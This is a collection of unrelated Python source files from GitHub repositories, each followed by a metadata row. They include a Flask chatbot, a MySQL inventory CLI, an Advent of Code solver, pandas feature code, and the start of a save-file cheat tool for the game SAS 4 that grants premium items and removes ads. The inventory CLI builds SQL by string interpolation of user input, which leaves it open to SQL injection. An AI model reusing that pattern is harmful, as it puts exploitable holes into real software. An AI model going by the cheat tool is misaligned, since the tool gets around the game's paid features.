        module+fn; falls back to the repository entrypoint when a pipeline name is set.
        '''
        if self.python_file and self.fn_name:
            return LoaderEntrypoint.from_file_target(
                python_file=self.python_file, fn_name=self.fn_name, from_handle=from_handle
            )
        elif self.module_name and self.fn_name:
            return LoaderEntrypoint.from_module_target(
                module_name=self.module_name, fn_name=self.fn_name, from_handle=from_handle
            )
        elif self.pipeline_name:
            return self.get_repository_entrypoint(from_handle=from_handle)
        raise DagsterInvariantViolationError(
            (
                'You have attempted to directly load a pipeline with an invalid '
                'combination of properties module_name {module_name} python_file '
                '{python_file} fn_name {fn_name}.'
            ).format(
                module_name=self.module_name, fn_name=self.fn_name, python_file=self.python_file
            )
        )
    def _asdict(self):
        '''namedtuple._asdict with path fields normalized to Posix form for portability.'''
        ddict = super(_ExecutionTargetHandleData, self)._asdict()
        # Normalize to Posix paths
        for key in ['repository_yaml', 'python_file']:
            if ddict[key]:
                ddict[key] = Path(ddict[key]).as_posix()
        return ddict
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster/core/definitions/handle.py | handle.py | py | 28,007 | python | en | code | 2 | github-code | 36 |
26921499285 | import random
import json
import datetime
from flask import Flask, request, render_template
from flask_cors import CORS, cross_origin
from nltk.chat.util import Chat, reflections
# Flask application with permissive CORS so the chat widget can POST cross-origin.
app = Flask(__name__)
cors = CORS(app)
app.config["CORS_HEADERS"] = "Content-Type"
# NOTE(review): date/time are captured once at import, so the bot always reports
# the server's startup time, not the time of the question — confirm intended.
current_date = datetime.datetime.now().strftime("%A, %B %d, %Y")
current_time = datetime.datetime.now().strftime("%H:%M:%S")
# Pattern/response pairs consumed by nltk.chat.util.Chat.
pairs = [
    ["hi", ["Hello!", "Hi there!"]],
    ["what is your name?", ["My name is Chatbot."]],
    ["bye", ["Goodbye!", "Bye!"]],
    ["what is the current date?", [f"The current date is {current_date}."]],
    ["what is the current time?", [f"The current time is {current_time}."]],
]
# Secondary knowledge base: question -> answer (or list of answers).
with open("data.json", "r", encoding="utf-8") as f:
    data = json.load(f)
# In-memory log of exchanges persisted by save_user_input().
user_inputs = []
def chatbot_response(user_input, confirm_message, new_data):
    """Produce a reply for *user_input*.

    Resolution order: NLTK pattern match, then the data.json knowledge base.
    When the NLTK chat has no answer and *confirm_message* is "yes" with
    *new_data* supplied, the answer is written into data.json.
    """
    bot_response = ""
    if user_input:
        chatbot = Chat(pairs, reflections)
        bot_response = chatbot.respond(user_input)
        if not bot_response:
            if user_input in data:
                if isinstance(data[user_input], list):
                    bot_response = random.choice(data[user_input])
                else:
                    bot_response = data[user_input]
            else:
                bot_response = "I'm sorry, I'm not sure. Please try asking a different question or providing more information."
            # NOTE(review): any confirm_message overrides the answer found above,
            # even when the knowledge base already had one — confirm intended.
            if confirm_message:
                if confirm_message.lower() == "yes":
                    if new_data:
                        data[user_input] = new_data
                        # Persist the whole knowledge base on each addition.
                        with open("data.json", "w", encoding="utf-8") as f:
                            json.dump(data, f, ensure_ascii=False)
                        bot_response = (
                            "Thank you! I've added that to my knowledge base."
                        )
                    else:
                        bot_response = "I'm sorry, I didn't receive any new data. Please try again."
                else:
                    bot_response = "I'm sorry, I can't help with that."
            else:
                bot_response = "I'm not sure what you mean. Do you want to add this to my knowledge base?"
        else:
            # NOTE(review): the exchange is logged only when the NLTK chat matched;
            # unanswered questions are never saved — confirm intended.
            save_user_input(user_input, bot_response)
    return bot_response
def save_user_input(user_input, bot_response):
    """Append the exchange to the in-memory log and persist the full log to disk."""
    entry = {"user_input": user_input, "bot_response": bot_response}
    user_inputs.append(entry)
    with open("user_inputs.json", "w", encoding="utf-8") as log_file:
        json.dump(user_inputs, log_file, ensure_ascii=False)
@app.route("/")
def index():
    """Serve the chat UI page."""
    return render_template("index.html")
@app.route("/chat", methods=["POST"])
@cross_origin()
def chat():
    """Handle one POSTed chat turn; returns the bot reply as a JSON response body.

    Form fields: user_input (required), confirm_message and new_data (optional,
    used to confirm adding a new answer to the knowledge base).
    """
    user_input = request.form.get("user_input")
    confirm_message = request.form.get("confirm_message")
    new_data = request.form.get("new_data")
    bot_response = ""
    if user_input:
        bot_response = chatbot_response(user_input, confirm_message, new_data)
        response = {"bot_response": bot_response}
    else:
        response = {
            "bot_response": "I'm sorry, I did not receive any input. Please try again."
        }
    return response
# Run the Flask development server when executed directly.
if __name__ == "__main__":
    app.run(debug=True, port=8080)
| sinde530/python | pino-chatbot/flask_test.py | flask_test.py | py | 3,170 | python | en | code | 0 | github-code | 36 |
39753649325 | import pandas as pd
import numpy as np
from datetime import date, datetime
import pickle
import warnings
warnings.filterwarnings("ignore")
def holiday(col):
    """Return 1 when *col* (a 'DD-MM-YYYY' string) is one of the tracked
    2018/2019 holidays, otherwise 0."""
    holiday_dates = (
        "01-01-2018", "16-01-2018", "20-02-2018", "31-03-2018",
        "29-05-2018", "04-07-2018", "05-07-2018", "28-07-2018",
        "04-09-2018", "10-11-2018", "23-11-2018", "24-11-2018",
        "24-12-2018", "25-12-2018", "31-12-2018", "01-01-2019",
        "16-01-2019", "20-02-2019", "31-03-2019", "29-05-2019",
        "04-07-2019", "05-07-2019", "28-07-2019", "04-09-2019",
        "10-11-2019", "28-11-2019", "29-11-2019", "24-12-2019",
        "25-12-2019", "31-12-2019",
    )
    return 1 if col in holiday_dates else 0
# The provider's season labels don't match the calendar, so derive the season from the date.
def season_of_date(col):
    """Map a timestamp to its northern-hemisphere season name
    ('spring' / 'summer' / 'autumn' / 'winter')."""
    yr = str(col.year)
    # Day-first date strings (day > 12) so pandas parses them unambiguously.
    ranges = {
        'spring': pd.date_range(start='21-03-' + yr, end='20-06-' + yr),
        'summer': pd.date_range(start='21-06-' + yr, end='22-09-' + yr),
        'autumn': pd.date_range(start='23-09-' + yr, end='20-12-' + yr),
    }
    for season_name in ('spring', 'summer', 'autumn'):
        if col in ranges[season_name]:
            return season_name
    return 'winter'
def workingday(col1, col2):
    """Return 1 on a regular working day; 0 on holidays (col1 == 1) and on
    weekends (col2 == 6 or 7, i.e. Saturday/Sunday in the 1..7 weekday scheme)."""
    is_holiday = col1 == 1
    is_weekend = col2 in (6, 7)
    return 0 if (is_holiday or is_weekend) else 1
def usuario(fe, cli, dataf):
    """Build a one-row feature frame for a user request.

    Args:
        fe: (day, month-name) pair with the Spanish month name, e.g. ("15", "julio").
        cli: Spanish weather description ("despejado", "nublado", "tormenta", "horrible").
        dataf: historical frame used to impute atemp/hum/windspeed by averaging rows
            with the same season/weathersit/mnth/holiday combination.

    Returns:
        pd.DataFrame with a single row ready for the model (no dteday column).
    """
    meses = {"01":"enero", "02":"febrero", "03":"marzo",
            "04":"abril", "05": "mayo","06":"junio",
            "07": "julio", "08": "agosto", "09": "septiembre",
            "10": "octubre", "11": "noviembre", "12": "diciembre"}
    dict_clima = {"1": "despejado", "2": "nublado", "3": "tormenta", "4":"horrible"}
    # Build "DD-monthname-2019" then translate the month name to its number.
    dteday = "-".join(fe)+"-2019"
    for k,v in dict_clima.items():
        if v in cli:
            clima = cli.replace(v,k)
    for k,v in meses.items():
        if v in dteday:
            dteday = dteday.replace(v,k)
    dict_usuario = {"dteday" : dteday,"season": 0 , "yr": 1, "mnth":0 ,
                    "holiday": 0, "weekday": 0 ,"workingday":0, "weathersit": int(clima),
                    "atemp": 0, "hum": 0, "windspeed": 0 }
    df_usuario = pd.DataFrame(dict_usuario, index = [0])
    df_usuario["holiday"] = df_usuario["dteday"].apply(holiday)
    # Parse explicitly as day-month-year: the default parser would read ambiguous
    # strings such as "05-07-2019" month-first (May 7 instead of July 5), which
    # would corrupt season/weekday/month downstream.
    df_usuario.dteday = pd.to_datetime(df_usuario.dteday, format="%d-%m-%Y")
    df_usuario["season"] = df_usuario["dteday"].apply(season_of_date)
    df_usuario["weekday"] = df_usuario["dteday"].dt.dayofweek
    # Shift dayofweek (0..6) to 1..7, Monday through Sunday.
    df_usuario["weekday"] = df_usuario["weekday"] + 1
    df_usuario["mnth"] = df_usuario["dteday"].dt.month
    df_usuario["workingday"] = df_usuario.apply(lambda col: workingday(col["holiday"], col["weekday"]), axis = 1)
    season = df_usuario["season"][0]
    weathersit = df_usuario["weathersit"][0]
    month = df_usuario["mnth"][0]
    holiday_yn = df_usuario["holiday"][0]
    # Impute weather-dependent features from historical rows with the same context.
    humedad = dataf[(dataf["season"] == season) & (dataf["weathersit"] == weathersit) & (dataf["mnth"] == month) &(dataf["holiday"] == holiday_yn)]["hum"].mean()
    sensacion = dataf[(dataf["season"] == season) & (dataf["weathersit"] == weathersit) & (dataf["mnth"] == month) &(dataf["holiday"] == holiday_yn)]["atemp"].mean()
    viento = dataf[(dataf["season"] == season) & (dataf["weathersit"] == weathersit) & (dataf["mnth"] == month) &(dataf["holiday"] == holiday_yn)]["windspeed"].mean()
    df_usuario[["atemp", "hum", "windspeed"]] = sensacion, humedad, viento
    df_usuario.drop("dteday", axis=1, inplace= True)
    return df_usuario
def encoding(dataf):
    """Ordinal-encode the categorical columns of *dataf* in place and return it."""
    mappings = {
        "holiday": {0: 7, 1: 0},
        "weathersit": {3: 0, 2: 2, 1: 4},
        "season": {"winter": 0, "autumn": 1, "spring": 1, "summer": 2},
        "weekday": {1: 0, 2: 1, 3: 1, 4: 2, 5: 2, 6: 2, 7: 1},
        "mnth": {1: 0, 2: 0, 3: 1, 4: 1, 5: 2, 6: 2, 7: 2, 8: 2, 9: 2, 10: 2, 11: 1, 12: 1},
        "workingday": {0: 1, 1: 2},
        "yr": {0: 1, 1: 2},
    }
    for column, mapping in mappings.items():
        dataf[column] = dataf[column].map(mapping)
    return dataf
11580020473 | import mysql.connector
from tabulate import tabulate
import getpass
def login():
    # This function is for establishing connection
    # between python and mysql database by taking
    # input of user id and password and host name
    # then it take the input of database from the
    # user and if the database exits it will select
    # it for further queries else it will create one
    # and use it.
    try:
        global app_cursor
        global connection
        connection = mysql.connector.connect(user=input('Username: '),
                                             password=input('Password: '), host=input('Host: '))
        app_cursor = connection.cursor(buffered=True)
        app_cursor.execute("show databases")
        app_database = input('Database: ')
        database_selected = False
        # Scan the "show databases" rows for an exact name match.
        for i in app_cursor.fetchall():
            for j in i:
                if app_database == j:
                    app_cursor.execute("use %s" % app_database)
                    print('\n', app_database, " is now the selected database.", '\n')
                    database_selected = True
                    break
        # Create the database on the fly when it does not exist yet.
        if database_selected is False:
            app_cursor.execute("create database %s" % app_database)
            app_cursor.execute("use %s" % app_database)
            print('\n', app_database, " is now the selected database.", '\n')
        table_menu()
    # NOTE(review): each failure path recurses into login(); repeated failures
    # deepen the call stack instead of looping — confirm acceptable.
    except mysql.connector.errors.ProgrammingError:
        print("\nEnter valid Username and Password!!\n")
        login()
    except mysql.connector.errors.InterfaceError:
        print("\nEnter valid Host name.\n")
        login()
    except mysql.connector.errors.DatabaseError:
        print("\nSomething went wrong try again.\n")
        login()
def table_menu():
    # This function gives the user the menu for operation
    # this is the main menu there is another menu for performing
    # operations on the table and it will be triggered on users demand.
    print('''To perform given functions enter the numerical value\nassigned to the function:-\n
    1 => Create Table.
    2 => Perform Operations on Table.
    3 => To check Stock Tables in the selected Database.
    4 => Delete table.
    5 => Logout and exit.
    Note:- To terminate any operation you selected by
           mistake enter '?' symbol it will take you back
           to the menu.
    ''')
    try:
        # Dispatcher for the menu; recursion is used to return to this menu.
        # NOTE(review): table names are interpolated into SQL unescaped.
        def table_menu_functions(a):
            if a == 1:
                # This set of code will be executed when user wants to create table.
                # By taking a string input for table name.
                # If the table of given name already exists in the selected database,
                # the function will be again called with parameter 1
                name = str(input("Enter table Name: "))
                if name == '?':
                    table_menu()
                else:
                    try:
                        app_cursor.execute('''Create table %s(
                        Id varchar (255) not null primary key,
                        Name varchar(255) not null,
                        Category varchar(255) not null,
                        Price int,
                        Stock int)''' % name)
                        print("Table Created successfully.\n")
                        connection.commit()
                        table_menu()
                    except mysql.connector.errors.ProgrammingError:
                        print("Table of this name already exists")
                        table_menu_functions(1)
            elif a == 4:
                # This set of code if for choice 4 that is for is for deleting table from selected database.
                # By taking a string input and further asking for confirmation for deleting the table.
                # If table not exists in the database then the exception is handled in except block.
                name = str(input("Enter table Name: "))
                try:
                    if name == '?':
                        table_menu()
                    else:
                        confirmation = str(input("Are you sure you want to delete the above table (y/n): "))
                        confirmation.lower()
                        if confirmation == 'y':
                            app_cursor.execute("Drop table %s" % name)
                            print("Table %s is deleted permanently.\n" % name)
                            connection.commit()
                            table_menu()
                        elif confirmation == 'n':
                            print("Table %s is not deleted\n." % name)
                            table_menu()
                except mysql.connector.errors.ProgrammingError:
                    print("Table of this name do not exist\n.")
                    table_menu()
            elif a == 5:
                # This set of code is choice 5 that is Save and exit application.
                # Its saves all the query processed and closes the connection and cursor.
                # After that it leave a vague input statement to prevent to sudden close of console window.
                import sys
                connection.commit()
                app_cursor.close()
                connection.close()
                input("Press any key to exit..")
                sys.exit()
            elif a == 3:
                # This set of code is choice 3 that is to print the list of stock tables in the selected database.
                # It print the list in a Table format with the help of Tabulate function of Tabulate module.
                app_cursor.execute("Show tables")
                data = app_cursor.fetchall()
                tables = []
                for i in data:
                    tables.append(i)
                print("\n", tabulate(tables, headers=['Names'], tablefmt='psql'), "\n")
                table_menu()
            elif a == 2:
                # This set of code is for performing operations on the table.
                # By taking input of the table name on which user wants to perform functions.
                # It checks whether the given table name exists in the database or not.
                # If exists it triggers the function function_menu(args: Table name).
                # If not exists it will ask again for input.
                name = str(input("Enter table Name: "))
                if name == '?':
                    table_menu()
                else:
                    app_cursor.execute("show tables")
                    existance = False
                    for i in app_cursor:
                        for j in i:
                            if j == name:
                                existance = True
                                break
                            else:
                                continue
                    if existance is True:
                        function_menu(name)
                    else:
                        print("\nEnter valid table name. This table does not exist in the current database.\n")
                        choice = int(input("To go back to main menu enter 1 and To re-enter the table name enter 2."
                                           "(1/2)"))
                        if choice == 1:
                            table_menu()
                        elif choice == 2:
                            table_menu_functions(2)
                        else:
                            print("Invalid input directing back to main menu.")
                            table_menu()
            else:
                # If users enter anything other than listed in menu then this code will be executed.
                # It again asks for the input from the user.
                print("Enter Number from The menu only.")
                choice = int(input("Your Choice: "))
                table_menu_functions(choice)
        table_menu_choice = int(input("Your Choice: "))
        table_menu_functions(table_menu_choice)
    except ValueError:
        # If user enter anything other than integer.
        print("Enter valid input.")
        table_menu()
def function_menu(name):
    #This function is for editing table
    # For tasks like Adding item to table, deleting item from table and updating item stock
    # NOTE(review): values are interpolated into SQL with % and are not escaped.
    global headers
    headers = ['Id', 'Name', 'Category', 'Price', 'Stock']
    name = name
    print('''To perform given functions enter the numerical value\nassigned to the function:-\n
    1 => To print The Stock Table.
    2 => To add a product to stock table.
    3 => To delete a product from the stock table.
    4 => To Perform operations on a product.
    5 => To export data of table to excel file.
    6 => To go back to previous menu.
    Note:- To terminate any operation you selected by
           mistake enter '?' symbol it will take you back
           to the menu.''')
    try:
        choice = int(input("Your choice: "))
        if choice == 1:
            # Print the whole stock table.
            app_cursor.execute("Select * from %s" % name)
            data = []
            for i in app_cursor:
                data.append(i)
            print(tabulate(data, headers=headers, tablefmt='psql'))
            function_menu(name)
        if choice == 2:
            # Collect each product field, re-prompting on invalid numeric input.
            while True:
                try:
                    p_id = input("Enter the Product ID: ")
                    if p_id == '?':
                        table_menu()
                        break
                    else:
                        break
                except ValueError:
                    print("Enter valid input.")
            while True:
                try:
                    p_name = input("Enter the Product Name: ")
                    if p_name == '?':
                        table_menu()
                    else:
                        break
                except ValueError:
                    print("Enter valid input.")
            while True:
                try:
                    p_category = input("Enter the Product Category: ")
                    if p_category == '?':
                        table_menu()
                    else:
                        break
                except ValueError:
                    print("Enter valid input.")
            while True:
                try:
                    p_price = int(input("Enter the Product Price: "))
                    break
                except ValueError:
                    print("Enter valid input.")
            while True:
                try:
                    p_quantity = int(input("Enter the Product stock: "))
                    break
                except ValueError:
                    print("Enter valid input.")
            app_cursor.execute("insert into %s values('%s','%s','%s',%d,%d)"
                               % (name, p_id, p_name, p_category, p_price, p_quantity))
            connection.commit()
            function_menu(name)
        elif choice == 3:
            # Show the matching row, then delete after confirmation.
            p_id = input("Enter the Product ID of the product you want to delete: ")
            app_cursor.execute("select * from %s where Id='%s'" % (name, p_id))
            data = []
            for i in app_cursor:
                data.append(i)
            print(tabulate(data, headers=headers, tablefmt='psql'))
            while True:
                conf = input("Are you sure you want to this product (y/n): ")
                if conf == 'y':
                    app_cursor.execute("delete from %s where Id='%s'" % (name, p_id))
                    connection.commit()
                    break
                elif conf == 'n':
                    function_menu(name)
                    break
                else:
                    print("Enter valid input.")
            function_menu(name)
        elif choice == 6:
            table_menu()
        elif choice == 4:
            product_update(name)
        elif choice == 5:
            # Export the table to an .xlsx workbook on drive D:.
            import xlsxwriter
            q = 0
            while q < 1:
                try:
                    filename = input("Enter file name: ")
                    print("File will be saved on the desktop")
                    workbook = xlsxwriter.Workbook("D:\\%s.xlsx" % filename)
                    worksheet = workbook.add_worksheet()
                    worksheet.write(0, 0, "ID")
                    worksheet.write(0, 1, "NAME")
                    worksheet.write(0, 2, "CATEGORY")
                    worksheet.write(0, 3, "PRICE")
                    worksheet.write(0, 4, "STOCK")
                    app_cursor.execute("SELECT * FROM %s" % name)
                    data = app_cursor.fetchall()
                    row = 1
                    coloumn = 0
                    for (a, b, c, d, e) in data:
                        worksheet.write(row, coloumn, a)
                        worksheet.write(row, coloumn + 1, b)
                        worksheet.write(row, coloumn + 2, c)
                        worksheet.write(row, coloumn + 3, d)
                        worksheet.write(row, coloumn + 4, e)
                        row = row + 1
                    workbook.close()
                    print("Data exported successfully to %s at D drive" % filename)
                    break
                except:
                    # NOTE(review): bare except assumes a name clash, but any failure
                    # (permissions, missing drive) prints the same message — confirm.
                    print("A file of this name already exists use a different name")
            function_menu(name)
    except ValueError:
        print("Enter valid input.")
        function_menu(name)
def product_update(name):
    # Sub-menu for updating a single product's name/stock/price/category.
    # NOTE(review): values are interpolated into SQL with % and are not escaped.
    name = name
    print('''To perform given functions enter the numerical value\nassigned to the function:-\n
    1 => To update stock of product.
    2 => To update name of product.
    3 => To update price of product.
    4 => To change category of product.
    5 => To go back to previous menu.
    Note:- To terminate any operation you selected by
           mistake enter '?' symbol it will take you back
           to the menu.''')
    try:
        choice = int(input("Your choice: "))
        if choice == 2:
            name_p = str(input("Enter the name of the product: "))
            if name_p == '?':
                product_update(name)
            else:
                app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
                data = []
                for i in app_cursor:
                    data.append(i)
                print(tabulate(data, headers=headers, tablefmt='psql'))
                id_p = str(input("Enter the product id of product you want to change name: "))
                name_new = str(input("Enter the new name of the product: "))
                if name_new == '?' or id_p == '?':
                    product_update(name)
                    # NOTE(review): commit here runs only after the recursive menu
                    # returns; the rename branch below never commits — confirm.
                    connection.commit()
                else:
                    app_cursor.execute("update %s set Name='%s' where Id='%s'" % (name, name_new, id_p))
                    print("Product name updated successfully.")
                    product_update(name)
        elif choice == 1:
            name_p = str(input("Enter the name of the product: "))
            if name_p == '?':
                product_update(name)
            else:
                app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
                data = []
                for i in app_cursor:
                    data.append(i)
                print(tabulate(data, headers=headers, tablefmt='psql'))
                id_p = str(input("Enter the product id of product you want to change stock: "))
                stock_new = int(input("New stock of the product: "))
                if id_p == '?':
                    product_update(name)
                else:
                    app_cursor.execute("update %s set Stock=%d where Id='%s'" % (name, stock_new, id_p))
                    print("Product Stock updated successfully.")
                    connection.commit()
                    product_update(name)
        elif choice == 5:
            function_menu(name)
        elif choice == 3:
            name_p = str(input("Enter the name of the product: "))
            if name_p == '?':
                product_update(name)
            else:
                app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
                data = []
                for i in app_cursor:
                    data.append(i)
                print(tabulate(data, headers=headers, tablefmt='psql'))
                id_p = str(input("Enter the product id of product you want to change price: "))
                price_new = int(input("New price of the product: "))
                if id_p == '?':
                    product_update(name)
                else:
                    app_cursor.execute("update %s set Price=%d where Id='%s'" % (name, price_new, id_p))
                    print("Product Price updated successfully.")
                    connection.commit()
                    product_update(name)
        elif choice == 4:
            name_p = str(input("Enter the name of the product: "))
            if name_p == '?':
                product_update(name)
            else:
                app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
                data = []
                for i in app_cursor:
                    data.append(i)
                print(tabulate(data, headers=headers, tablefmt='psql'))
                id_p = str(input("Enter the product id of product you want to change category: "))
                category_new = str(input("New Category of the product: "))
                if id_p == '?':
                    product_update(name)
                else:
                    app_cursor.execute("update %s set Category='%s' where Id='%s'" % (name, category_new, id_p))
                    print("Product Category updated successfully.")
                    connection.commit()
                    product_update(name)
    except ValueError:
        print("Enter valid input.")
        product_update(name)
login()
| manavmittal05/InventoryManagement | ManavMittal_2021538_Master Stock-1.py | ManavMittal_2021538_Master Stock-1.py | py | 18,424 | python | en | code | 0 | github-code | 36 |
17106921371 | import os
from dataclasses import dataclass, field
from typing import List
# Read the puzzle input (one instruction per line) from a file next to this script.
# NOTE(review): readlines() items keep their trailing newline, so the `if line`
# filter never drops anything — blank lines survive as "" only after strip().
with open(os.path.join(os.path.dirname(__file__), "input"), "r") as inputFile:
    inputLines = [line.strip() for line in inputFile.readlines() if line]
@dataclass
class Signal:
    """Register value observed at a given CPU cycle; strength = cycle * register."""

    cycle: int
    register: int
    # Derived value. Declared as a real dataclass field so type checkers and
    # dataclass machinery see it, but kept out of __init__/__repr__/__eq__ to
    # preserve the original behavior (where it was a bare class attribute).
    strength: int = field(default=0, init=False, repr=False, compare=False)

    def __post_init__(self):
        self.strength = self.cycle * self.register
@dataclass
class CRT:
    """40-column CRT screen: rows of '#'/'.' pixels built one pixel at a time."""

    pixels: List[str] = field(default_factory=lambda: [""])

    def drawPixel(self, register: int) -> None:
        """Append one pixel to the current row; lit when the 3-wide sprite
        centered on *register* overlaps the beam position. Start a new row
        after 40 pixels."""
        position = len(self.pixels[-1])
        sprite_hit = abs(position - register) <= 1
        self.pixels[-1] += "#" if sprite_hit else "."
        if len(self.pixels[-1]) == 40:
            self.pixels.append("")

    def __str__(self) -> str:
        return "\n".join(self.pixels)
class CPU:
    """Minimal register machine: executes noop/addx micro-ops, records the
    register state per cycle, samples "interesting" signals, and drives a CRT."""

    def __init__(self) -> None:
        self.states: List[Signal] = [Signal(cycle=0, register=1)]
        self.instructions: List[str] = []
        self.interestingSignals: List[Signal] = []
        self.crt = CRT()

    def parseLine(self, line) -> None:
        """Expand a source line into one-cycle micro-instructions."""
        if line == "noop":
            self.instructions.append("noop")
            return
        # addx takes two cycles: one to start, one to apply the delta.
        self.instructions.append("start " + line)
        self.instructions.append("end " + line)

    def executeInstructions(self) -> None:
        """Run every queued micro-instruction, one per cycle."""
        for cycle, instruction in enumerate(self.instructions, start=1):
            register = self.states[-1].register
            self.crt.drawPixel(register)
            # The signal is sampled *during* cycles 20, 60, 100, ...
            if cycle % 40 == 20:
                self.interestingSignals.append(Signal(register=register, cycle=cycle))
            if instruction.startswith("end "):
                register += int(instruction.rsplit(" ", 1)[1])
            self.states.append(Signal(register=register, cycle=cycle))

    def sumInterestingSignals(self) -> int:
        """Total strength of all sampled signals."""
        return sum(signal.strength for signal in self.interestingSignals)
def answer(iterable):
    """Run the CPU over the instruction lines and print both puzzle answers."""
    cpu = CPU()
    [cpu.parseLine(line) for line in iterable]
    cpu.executeInstructions()
    # Answer 1
    print(cpu.sumInterestingSignals())
    # Answer 2
    print(cpu.crt)
answer(inputLines)
| mmmaxou/advent-of-code | 2022/day-10/answer.py | answer.py | py | 2,140 | python | en | code | 0 | github-code | 36 |
33516010146 | # -*- coding: utf-8 -*-
from collective.es.index.interfaces import IElasticSearchClient
from elasticsearch import Elasticsearch
from zope.component import provideUtility
from zope.interface import directlyProvides
class ElasticSearchIngressConfFactory(object):
    """Builds query and ingest Elasticsearch clients from a configuration
    section and registers the query client as the IElasticSearchClient utility."""

    def __init__(self, section):
        self.section = section

    def _client_dict(self, value):
        # Translate (host, port) pairs into the dict form the client expects,
        # falling back to a single local default node when nothing is configured.
        if not value:
            value = [('127.0.0.1', '9200')]
        entries = []
        for pair in value:
            entries.append(dict(zip(['host', 'port'], pair)))
        return entries

    def prepare(self, *args, **kwargs):
        section = self.section
        self.query = self._client_dict(section.query)
        self.ingest = self._client_dict(section.ingest)
        self.ssl = section.ssl
        self.verify_certs = section.verify_certs
        self.ca_certs = section.ca_certs
        self.client_cert = section.client_cert
        self.client_key = section.client_key

    def create(self):
        query_client = Elasticsearch(
            self.query,
            use_ssl=self.ssl,
            # here some more params need to be configured.
        )
        ingest_client = Elasticsearch(
            self.ingest,
            use_ssl=self.ssl,
            # here some more params need to be configured.
        )
        # The ingest client rides along as an attribute of the query client.
        query_client.ingest = ingest_client
        directlyProvides(query_client, IElasticSearchClient)
        provideUtility(query_client)
| collective/collective.es.index | src/collective/es/index/components.py | components.py | py | 1,379 | python | en | code | 0 | github-code | 36 |
31064293035 |
from ..utils import Object
class Photo(Object):
    """
    Describes a photo

    Attributes:
        ID (:obj:`str`): ``Photo``

    Args:
        has_stickers (:obj:`bool`):
            True, if stickers were added to the photoThe list of corresponding sticker sets can be received using getAttachedStickerSets
        minithumbnail (:class:`telegram.api.types.minithumbnail`):
            Photo minithumbnail; may be null
        sizes (List of :class:`telegram.api.types.photoSize`):
            Available variants of the photo, in different sizes

    Returns:
        Photo

    Raises:
        :class:`telegram.Error`
    """
    ID = "photo"

    def __init__(self, has_stickers, minithumbnail, sizes, **kwargs):
        self.has_stickers = has_stickers  # bool
        self.minithumbnail = minithumbnail  # Minithumbnail
        self.sizes = sizes  # list of photoSize

    @staticmethod
    def read(q: dict, *args) -> "Photo":
        # Deserialize nested TDLib objects field by field; missing keys yield None/[].
        has_stickers = q.get('has_stickers')
        minithumbnail = Object.read(q.get('minithumbnail'))
        sizes = [Object.read(i) for i in q.get('sizes', [])]
        return Photo(has_stickers, minithumbnail, sizes)
| iTeam-co/pytglib | pytglib/api/types/photo.py | photo.py | py | 1,177 | python | en | code | 20 | github-code | 36 |
17971188881 | from pyrainbird.resources import RAIBIRD_COMMANDS
def decode(data):
    """Decode a controller response hex string into a dict keyed by field name.

    Unknown responses come back unparsed as {"data": data}.
    """
    responses = RAIBIRD_COMMANDS["ControllerResponses"]
    response_id = data[:2]
    if response_id not in responses:
        return {"data": data}
    template = responses[response_id]
    decoded = {"type": template["type"]}
    for field_name, spec in template.items():
        # Only entries describing a hex slice carry position/length metadata.
        if isinstance(spec, dict) and "position" in spec and "length" in spec:
            start = spec["position"]
            decoded[field_name] = int(data[start:start + spec["length"]], 16)
    return decoded
def encode(command, *args):
    """Encode *command* plus integer arguments into a hex request string.

    :param command: base command name; ``"Request"`` is appended to look it
        up in ``RAIBIRD_COMMANDS["ControllerCommands"]``
    :param args: numeric arguments, rendered as fixed-width hex
    :raises Exception: if the command is unknown or too many arguments are
        supplied
    """
    request_command = "%sRequest" % command
    # BUG FIX: check membership *before* indexing; the original indexed the
    # dict first, so an unknown command raised a bare KeyError and the
    # descriptive Exception below was unreachable.
    if request_command not in RAIBIRD_COMMANDS["ControllerCommands"]:
        raise Exception(
            "Command %s not available. Existing commands: %s"
            % (request_command, RAIBIRD_COMMANDS["ControllerCommands"])
        )
    command_set = RAIBIRD_COMMANDS["ControllerCommands"][request_command]
    cmd_code = command_set["command"]
    if len(args) > command_set["length"] - 1:
        raise Exception(
            "Too much parameters. %d expected:\n%s"
            % (command_set["length"] - 1, command_set)
        )
    params = (cmd_code,) + tuple(map(lambda x: int(x), args))
    # First argument is zero-padded to fill the remaining command length;
    # subsequent arguments are plain two-digit hex.
    arg_placeholders = (("%%0%dX" % ((command_set["length"] - len(args)) * 2))
                        if len(args) > 0
                        else "") + ("%02X" * (len(args) - 1))
    return ("%s" + arg_placeholders) % (params)
| shun84/jeedom-plugin-rainbird | resources/pyrainbird/rainbird.py | rainbird.py | py | 1,498 | python | en | code | 0 | github-code | 36 |
41643896349 | from _GLOBAL_OPTIONS_ import factionsOptionMenu, addPremiumItems, addRevive, AddNightmareTickets, removeAds, unlockProfiles
from _PROFILE_OPTIONS_ import addItemsMenu, changeUsername, addCash, setFreeSkillReset, setLevel, setBlackStronboxes, addBlackKeys, addAugmentCores, setSupportItems, addMultiplayerStats
from _UTILS_ import mainTitle
from _EDIT_MANUALLY_ import profileManualEdit
from _SET_PROFILE_PATH_ import setProfilePath
from _FIX_INVENTORY_CRASH_ import fixInventory
from os import _exit, path
from win32console import SetConsoleTitle
from string import ascii_letters
from time import sleep
from json import dump, load
from msvcrt import getch, kbhit
from sys import stdout
# Menu labels, in display order; hotkeys a, b, c, ... map onto these entries.
mainMenuSelection = ['Global', 'Profile', 'Edit manually', 'Settings', 'About', 'Exit']
configMenuSelection = ['Set Profile', 'Set Profile Path Folder', 'Back up Profile.save [WORK IN PROGRESS]', 'Fix Inventory', 'Back']
globalMenuSelection = ['Factions', 'Premium Items', 'Revive Tokens', 'Premium Nightmare Tickets', 'Remove ads (ADS ON MOBILE)', 'Unlock profile (5-6)', 'Back']
profileMenuSelection = ['Add items', 'Change username', 'Add SAS Cash', 'Set free skill reset', 'Set level', 'Add black Strongboxes', 'Add random Strongboxes [PLACE HOLDER (THIS FEATURE IS WORK IN PROGRESS)]', 'Add black keys', 'Add augment cores', 'Add support items', 'Set stats', 'Back']
def about():
    """Show the About screen, then return to the main menu on any key press."""
    mainTitle()
    print('''
Developed by: <\\>#0077 | 0daxelagnia
Special thanks to: BlapertureMesa ( cso-idn-player ) and hemisemidemipresent
Official Github repository: https://github.com/0daxelagnia/SAS4Tool/
Latest version: 2.0.0
Made with <3 for the SAS 4 cheats community!
(Press any key to go back)''')
    sleep(0.25)
    # Busy-wait until any key is hit, then hand control back.
    while not kbhit():
        pass
    return mainMenu()
